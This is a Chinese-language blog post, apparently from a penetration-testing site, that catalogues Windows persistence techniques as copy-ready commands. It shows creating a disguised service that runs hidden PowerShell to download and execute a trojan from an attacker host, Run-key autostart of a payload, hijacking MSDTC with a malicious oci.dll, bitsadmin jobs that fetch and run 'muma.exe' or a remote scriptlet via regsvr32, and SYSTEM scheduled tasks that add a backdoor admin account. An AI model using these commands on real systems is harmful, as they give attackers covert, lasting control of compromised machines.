• 服务启动
    使用SC命令创建windows服务名最好伪装下,binpath= 这里一定要注意有个空格,不然创建不成功,把powershell远程执行下载命令也包含进去地址:http://192.168.1.82:19001/a链接就是我们刚刚生成的木马地址

    1. sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX(((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\""
    2. SC config "name" start= auto //我们需要把这个name服务设置为自动。
    3. Sc description "name" "description" // 设置服务的描述字符串
    4. net start "name" // 启动服务
    5. SC delete "name" //删除这个服务,不想使用服务直接删除
      PS:不是所有程序都可以作为服务的方式运行,所以请看:http://www.x2009.net/articles/create-a-windows-service-methods.html
  • regedit 注册表启动
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f //当系统注销,再次进入登入到目标系统就会上线,权限是继承的。
  • MSDTC
    http://www.4hou.com/system/6890.html
    简单说:在域和工作组中,MSDTC服务启动时,会搜索注册表Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI,MSDTC.exe启动时会加载3个dll(oci.dll,SQLLib80.dll,xa80.dll),有一个dll不是系统自带的,我们可以把我们的dll马子替换成其中的那个不自带的dll的名字(oci.dll)。

    • net start msdtc // 手动启动 msdtc
    • 降权启动MSDTC.exe :msdtc -install
      >PS: 渗透技巧——程序的降权启动 http://t.cn/RSp4h4O
  • 启动项
    C:\Users\{user}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Bitsadmin
    该项的自启动是利用了schtasks来自启动的,必须要用户登录,且在登录后2-4分钟后才会执行,此法貌似是有个90天的限制的?
    需要权限:管理员

    说明:下方的start_test是任务名,%comspec%是cmd的绝对路径,%temp%是用户的临时目录。

  • 第一种:配合Powershell,测试成功
bitsadmin /create start_test //添加用户名
bitsadmin /addfile start_test %comspec% %temp%\cmd.exe //添加文件,此步骤是为下一步做铺垫,
bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:81/a'))\""  //第二步完成之后就启动这一步
bitsadmin /Resume start_test //启动下载任务
  • 第二种:直接下载EXE执行
bitsadmin /create start_test //创建任务
bitsadmin /addfile start_test http://www.baidu.com/muma.exe %temp%\muma.exe //添加文件,此步骤是为下一步做铺垫,
bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c bitsadmin.exe /complete \"backdoor\" && start /B %temp%\muma.exe"  //第二步完成之后就启动这一步
bitsadmin /Resume start_test //启动下载任务
  • 配合其他命令||我举一,你反三
    道理都是一样的,你可以用regsvr32,也可以用其他的下载命令。
bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec%  %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"
bitsadmin /Resume backdoor

更加多的命令请看阅读:windows命令执行漏洞不会玩? 看我!https://evi1cg.me/archives/remote_exec.html ||
下载文件的15种方法 - 爱小狐狸的小螃蟹http://www.vuln.cn/6665 ||
13种方式下载文件https://evi1cg.me/archives/13-ways-to-download-a-file.html

更多关于Bitsadmin姿势请阅读:Use bitsadmin to maintain persistence and bypass Autorunshttps://www.tuicool.com/articles/rqe63qj||
使用计划任务和bitsadmin实现恶意代码长期控守http://blog.csdn.net/qq_31481187/article/details/57540231

  • SchTasks
    >强大的任务计划功能,你值得拥有的:官方网站文档:https://technet.microsoft.com/zh-cn/library/cc772785.aspx#BKMK_days
Onstart:schtasks /create /tn sch /ru system /sc onstart /tr "net user admin admin /add"  /f
Onlogin:schtasks /create /tn sch /ru system /sc onlogin /tr "net user admin admin /add"  /f
Onidle:schtasks /create /tn sch /ru system /sc onidle /i 1 /tr "net user admin admin /add"  /f
every 1 min:schtasks /create /tn sch /ru system /sc MINUTE /mo 1   /tr "net user admin admin /add" /f
every 1 day:schtasks /create /tn sch /ru system /sc daily /mo 1   /tr "net user admin admin /add"  /f
onince:schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once /sd 01/01/2003 /st 00:00  /f

One Reply to “Windows自启动姿势20180425”

发表评论

电子邮件地址不会被公开。 必填项已用*标注